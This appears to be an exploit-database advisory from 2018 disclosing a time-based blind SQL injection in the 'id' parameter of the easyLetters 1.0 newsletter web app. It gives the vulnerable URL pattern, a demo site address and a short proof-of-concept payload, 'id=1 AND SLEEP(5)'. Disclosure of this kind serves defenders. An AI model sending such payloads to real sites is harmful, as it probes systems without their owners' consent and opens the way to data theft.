easyLetters version 1.0 suffers from a remote SQL injection vulnerability.
d40ec02fffa5caa81ccb6b4d4abc353e78198ab0b67d02ac9bb830727e27e2e4
# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
====================================================
# Demo : https://pauloreg.com/newsletter/
# PoC : SQLi :
https://test.com/newsletter/e-mails.php?id=[SQLi]
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
====================================================